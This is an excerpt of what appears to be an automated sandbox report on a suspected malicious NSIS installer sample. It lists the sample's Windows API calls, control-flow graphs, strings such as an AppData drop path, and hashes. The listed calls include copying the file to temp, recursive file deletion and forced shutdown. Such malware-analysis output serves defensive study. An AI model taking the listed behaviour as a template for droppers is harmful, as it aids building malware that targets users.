                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F1
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                                • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                              • ExitProcess.KERNEL32 ref: 0040370A
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371D
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                              • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\450707124374000811.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                              • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                              • ExitProcess.KERNEL32 ref: 004038B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\Desktop$C:\Users\user\Desktop\450707124374000811.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                              • API String ID: 2488574733-1279917723
                                                              • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                              • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                              • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                              • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                              Function 00404C62 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 139 404c62-404cae GetDlgItem * 2 140 404cb4-404d48 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404ecf-404ed6 139->141 142 404d57-404d5e DeleteObject 140->142 143 404d4a-404d55 SendMessageW 140->143 144 404ed8-404ee8 141->144 145 404eea 141->145 147 404d60-404d68 142->147 143->142 146 404eed-404ef6 144->146 145->146 148 404f01-404f07 146->148 149 404ef8-404efb 146->149 150 404d91-404d95 147->150 151 404d6a-404d6d 147->151 155 404f16-404f1d 148->155 156 404f09-404f10 148->156 149->148 152 404fe5-404fec 149->152 150->147 157 404d97-404dc3 call 404217 * 2 150->157 153 404d72-404d8f call 4062a4 SendMessageW * 2 151->153 154 404d6f 151->154 162 40505d-405065 152->162 163 404fee-404ff4 152->163 153->150 154->153 159 404f92-404f95 155->159 160 404f1f-404f22 155->160 156->152 156->155 196 404dc9-404dcf 157->196 197 404e8e-404ea1 GetWindowLongW SetWindowLongW 157->197 159->152 164 404f97-404fa1 159->164 168 404f24-404f2b 160->168 169 404f2d-404f42 call 404bb0 160->169 166 405067-40506d SendMessageW 162->166 167 40506f-405076 162->167 171 405245-405257 call 40427e 163->171 172 404ffa-405004 163->172 174 404fb1-404fbb 164->174 175 404fa3-404faf SendMessageW 164->175 166->167 176 405078-40507f 167->176 177 4050aa-4050b1 167->177 168->159 168->169 169->159 195 404f44-404f55 169->195 172->171 180 40500a-405019 SendMessageW 172->180 174->152 182 404fbd-404fc7 174->182 175->174 183 405081-405082 ImageList_Destroy 176->183 184 405088-40508f 176->184 187 405207-40520e 177->187 188 4050b7-4050c3 call 4011ef 177->188 180->171 189 40501f-405030 SendMessageW 180->189 191 404fd8-404fe2 182->191 192 404fc9-404fd6 182->192 183->184 193 405091-405092 GlobalFree 184->193 194 405098-4050a4 184->194 187->171 190 405210-405217 187->190 214 4050d3-4050d6 188->214 215 4050c5-4050c8 188->215 199 405032-405038 189->199 200 40503a-40503c 189->200 190->171 202 405219-405243 ShowWindow GetDlgItem ShowWindow 190->202 191->152 192->152 193->194 194->177 195->159 204 404f57-404f59 195->204 205 404dd2-404dd9 196->205 203 404ea7-404eab 197->203 199->200 201 40503d-405056 call 401299 SendMessageW 199->201 200->201 201->162 202->171 208 404ec5-404ecd call 40424c 203->208 209 404ead-404ec0 ShowWindow call 40424c 203->209 210 404f5b-404f62 204->210 211 404f6c 204->211 212 404e6f-404e82 205->212 213 404ddf-404e07 205->213 208->141 209->171 224 404f64-404f66 210->224 225 404f68-404f6a 210->225 228 404f6f-404f8b call 40117d 211->228 212->205 219 404e88-404e8c 212->219 226 404e41-404e43 213->226 227 404e09-404e3f SendMessageW 213->227 220 405117-40513b call 4011ef 214->220 221 4050d8-4050f1 call 4012e2 call 401299 214->221 216 4050ca 215->216 217 4050cb-4050ce call 404c30 215->217 216->217 217->214 219->197 219->203 241 405141 220->241 242 4051dd-4051f1 InvalidateRect 220->242 246 405101-405110 SendMessageW 221->246 247 4050f3-4050f9 221->247 224->228 225->228 229 404e45-404e54 SendMessageW 226->229 230 404e56-404e6c SendMessageW 226->230 227->212 228->159 229->212 230->212 243 405144-40514f 241->243 242->187 245 4051f3-405202 call 404b83 call 404b6b 242->245 248 405151-405160 243->248 249 4051c5-4051d7 243->249 245->187 246->220 253 4050fb 247->253 254 4050fc-4050ff 247->254 251 405162-40516f 248->251 252 405173-405176 248->252 249->242 249->243 251->252 256 405178-40517b 252->256 257 40517d-405186 252->257 253->254 254->246 254->247 259 40518b-4051c3 SendMessageW * 2 256->259 257->259 260 405188 257->260 259->249 260->259
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                              • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                              • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                              • DeleteObject.GDI32(00000000), ref: 00404D58
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                              • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                              • GlobalFree.KERNEL32(?), ref: 00405092
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                              • ShowWindow.USER32(?,00000000), ref: 00405231
                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                              • ShowWindow.USER32(00000000), ref: 00405243
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 1638840714-813528018
                                                              • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                              • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                              • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                              • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58
                                                              Function 00405990 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 570 405990-4059b6 call 405c5b 573 4059b8-4059ca DeleteFileW 570->573 574 4059cf-4059d6 570->574 575 405b4c-405b50 573->575 576 4059d8-4059da 574->576 577 4059e9-4059f9 call 406282 574->577 578 4059e0-4059e3 576->578 579 405afa-405aff 576->579 583 405a08-405a09 call 405b9f 577->583 584 4059fb-405a06 lstrcatW 577->584 578->577 578->579 579->575 582 405b01-405b04 579->582 585 405b06-405b0c 582->585 586 405b0e-405b16 call 4065c5 582->586 587 405a0e-405a12 583->587 584->587 585->575 586->575 594 405b18-405b2c call 405b53 call 405948 586->594 590 405a14-405a1c 587->590 591 405a1e-405a24 lstrcatW 587->591 590->591 593 405a29-405a45 lstrlenW FindFirstFileW 590->593 591->593 596 405a4b-405a53 593->596 597 405aef-405af3 593->597 610 405b44-405b47 call 4052e6 594->610 611 405b2e-405b31 594->611 600 405a73-405a87 call 406282 596->600 601 405a55-405a5d 596->601 597->579 599 405af5 597->599 599->579 612 405a89-405a91 600->612 613 405a9e-405aa9 call 405948 600->613 602 405ad2-405ae2 FindNextFileW 601->602 603 405a5f-405a67 601->603 602->596 609 405ae8-405ae9 FindClose 602->609 603->600 606 405a69-405a71 603->606 606->600 606->602 609->597 610->575 611->585 614 405b33-405b42 call 4052e6 call 406048 611->614 612->602 615 405a93-405a9c call 405990 612->615 623 405aca-405acd call 4052e6 613->623 624 405aab-405aae 613->624 614->575 615->602 623->602 627 405ab0-405ac0 call 4052e6 call 406048 624->627 628 405ac2-405ac8 624->628 627->602 628->602
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 004059B9
                                                              • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A01
                                                              • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A24
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A2A
                                                              • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A3A
                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                              • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                              Strings
                                                              • "C:\Users\user\Desktop\450707124374000811.exe", xrefs: 00405990
                                                              • \*.*, xrefs: 004059FB
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                              • API String ID: 2035342205-1482899044
                                                              • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                              • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                              • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                              • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                              Function 004065C5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CA4,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065D0
                                                              • FindClose.KERNEL32(00000000), ref: 004065DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                              • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                              • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                              • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698
                                                              Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 261 403d3e-403d50 262 403e91-403ea0 261->262 263 403d56-403d5c 261->263 265 403ea2-403eea GetDlgItem * 2 call 404217 SetClassLongW call 40140b 262->265 266 403eef-403f04 262->266 263->262 264 403d62-403d6b 263->264 267 403d80-403d83 264->267 268 403d6d-403d7a SetWindowPos 264->268 265->266 270 403f44-403f49 call 404263 266->270 271 403f06-403f09 266->271 273 403d85-403d97 ShowWindow 267->273 274 403d9d-403da3 267->274 268->267 279 403f4e-403f69 270->279 276 403f0b-403f16 call 401389 271->276 277 403f3c-403f3e 271->277 273->274 280 403da5-403dba DestroyWindow 274->280 281 403dbf-403dc2 274->281 276->277 298 403f18-403f37 SendMessageW 276->298 277->270 278 4041e4 277->278 286 4041e6-4041ed 278->286 284 403f72-403f78 279->284 285 403f6b-403f6d call 40140b 279->285 287 4041c1-4041c7 280->287 289 403dc4-403dd0 SetWindowLongW 281->289 290 403dd5-403ddb 281->290 294 4041a2-4041bb DestroyWindow EndDialog 284->294 295 403f7e-403f89 284->295 285->284 287->278 293 4041c9-4041cf 287->293 289->286 296 403de1-403df2 GetDlgItem 290->296 297 403e7e-403e8c call 40427e 290->297 293->278 300 4041d1-4041da ShowWindow 293->300 294->287 295->294 301 403f8f-403fdc call 4062a4 call 404217 * 3 GetDlgItem 295->301 302 403e11-403e14 296->302 303 403df4-403e0b SendMessageW IsWindowEnabled 296->303 297->286 298->286 300->278 331 403fe6-404022 ShowWindow KiUserCallbackDispatcher call 404239 EnableWindow 301->331 332 403fde-403fe3 301->332 306 403e16-403e17 302->306 307 403e19-403e1c 302->307 303->278 303->302 311 403e47-403e4c call 4041f0 306->311 308 403e2a-403e2f 307->308 309 403e1e-403e24 307->309 312 403e65-403e78 SendMessageW 308->312 314 403e31-403e37 308->314 309->312 313 403e26-403e28 309->313 311->297 312->297 313->311 317 403e39-403e3f call 40140b 314->317 318 403e4e-403e57 call 40140b 314->318 327 403e45 317->327 318->297 328 403e59-403e63 318->328 327->311 328->327 335 404024-404025 331->335 336 404027 331->336 332->331 337 404029-404057 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404059-40406a SendMessageW 337->338 339 40406c 337->339 340 404072-4040b1 call 40424c call 403d1f call 406282 lstrlenW call 4062a4 SetWindowTextW call 401389 338->340 339->340 340->279 351 4040b7-4040b9 340->351 351->279 352 4040bf-4040c3 351->352 353 4040e2-4040f6 DestroyWindow 352->353 354 4040c5-4040cb 352->354 353->287 356 4040fc-404129 CreateDialogParamW 353->356 354->278 355 4040d1-4040d7 354->355 355->279 357 4040dd 355->357 356->287 358 40412f-404186 call 404217 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 404188-4041a0 ShowWindow call 404263 358->363 363->287
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                              • ShowWindow.USER32(?), ref: 00403D97
                                                              • DestroyWindow.USER32 ref: 00403DAB
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                              • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                              • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                              • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                              • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                              • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                              • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                              • EnableWindow.USER32(?,?), ref: 0040401A
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                              • EnableMenuItem.USER32(00000000), ref: 00404037
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                              • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                              • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                              • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID:
                                                              • API String ID: 3282139019-0
                                                              • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                              • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                              • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                              • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                              Function 00403990 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 366 403990-4039a8 call 40665c 369 4039aa-4039ba call 4061c9 366->369 370 4039bc-4039f3 call 406150 366->370 379 403a16-403a3f call 403c66 call 405c5b 369->379 375 4039f5-403a06 call 406150 370->375 376 403a0b-403a11 lstrcatW 370->376 375->376 376->379 384 403ad1-403ad9 call 405c5b 379->384 385 403a45-403a4a 379->385 391 403ae7-403b0c LoadImageW 384->391 392 403adb-403ae2 call 4062a4 384->392 385->384 386 403a50-403a78 call 406150 385->386 386->384 393 403a7a-403a7e 386->393 395 403b8d-403b95 call 40140b 391->395 396 403b0e-403b3e RegisterClassW 391->396 392->391 397 403a90-403a9c lstrlenW 393->397 398 403a80-403a8d call 405b80 393->398 409 403b97-403b9a 395->409 410 403b9f-403baa call 403c66 395->410 399 403b44-403b88 SystemParametersInfoW CreateWindowExW 396->399 400 403c5c 396->400 404 403ac4-403acc call 405b53 call 406282 397->404 405 403a9e-403aac lstrcmpiW 397->405 398->397 399->395 403 403c5e-403c65 400->403 404->384 405->404 408 403aae-403ab8 GetFileAttributesW 405->408 413 403aba-403abc 408->413 414 403abe-403abf call 405b9f 408->414 409->403 419 403bb0-403bca ShowWindow call 4065ec 410->419 420 403c33-403c3b call 4053b9 410->420 413->404 413->414 414->404 427 403bd6-403be8 GetClassInfoW 419->427 428 403bcc-403bd1 call 4065ec 419->428 425 403c55-403c57 call 40140b 420->425 426 403c3d-403c43 420->426 425->400 426->409 429 403c49-403c50 call 40140b 426->429 432 403c00-403c23 DialogBoxParamW call 40140b 427->432 433 403bea-403bfa GetClassInfoW RegisterClassW 427->433 428->427 429->409 437 403c28-403c31 call 4038e0 432->437 433->432 437->403
                                                              APIs
                                                                • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                              • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\450707124374000811.exe",00000000), ref: 00403A11
                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
